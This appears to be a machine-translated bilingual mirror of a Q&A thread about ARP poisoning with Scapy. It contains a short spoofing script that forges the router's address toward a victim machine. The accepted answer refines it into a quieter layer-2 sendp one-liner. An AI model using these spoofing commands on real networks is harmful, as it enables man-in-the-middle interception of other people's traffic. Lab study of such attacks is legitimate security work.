Scapy Arp中毒对我不起作用
[英]Scapy arp poisoning not working for me
问题描述
I am attacking a Windows XP machine with Backtrack 5 using scapy. 
我正在使用Scapy攻击带有Backtrack 5的Windows XP计算机。
Now that's my code: 现在是我的代码:
#! /usr/bin/env python
from scapy.all import *
arp_p = ARP(op = 1, psrc = "192.168.0.1", pdst = "192.168.0.106", hwsrc = "00:0c:29:f0:2d:19", hwdst = "ff:ff:ff:ff:ff:ff)
send(arp_p)
The code above actually sends two packets for some reason. 上面的代码实际上出于某种原因发送了两个数据包。 One time my backtrack mac is asking: 我的回溯Mac曾经问过:
who has 192.168.0.106 (Victim's IP) ?
Then he gets the "is at" answer from the victim. 然后他从受害者那里得到“正在”答复。
And the second time my backtrack's mac is asking: 而我的原路第二次问我:
who has 192.168.0.106 (Victim's IP) ?
Then he gets the "is at" answer from the victim again. 然后他再次从受害者那里得到“正在”答复。
Then the victim's ARP table has to lines of the same mac but different IPs, one is the Backtrack's real IP and the second is the router's IP. 然后受害者的ARP表必须具有相同mac但不同IP的行,一个是Backtrack的真实IP,第二个是路由器的IP。
Why is this happenning? 为什么会这样呢?
1 个解决方案
解决方案1
1 已采纳 2014-01-25 15:22:32
The first ARP packet you see comes from Scapy, because it wants to fill the Ether frame with the Victim's MAC address before send() -ing your ARP packet. 您看到的第一个ARP数据包来自Scapy,因为它想在send() ing ARP数据包之前用受害者的MAC地址填充Ether帧。
If you don't want that to happen, try ( sendp sends at layer 2): 如果您不希望发生这种情况,请尝试( sendp在第2层发送):
>>> sendp(Ether(dst=ETHER_BROADCAST)/ARP(psrc = "192.168.0.1", pdst = "192.168.0.106"))
You can replace ETHER_BROADCAST with your victim's MAC address, that's less "noisy". 您可以将ETHER_BROADCAST替换为受害者的MAC地址,从而减少“噪音”。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.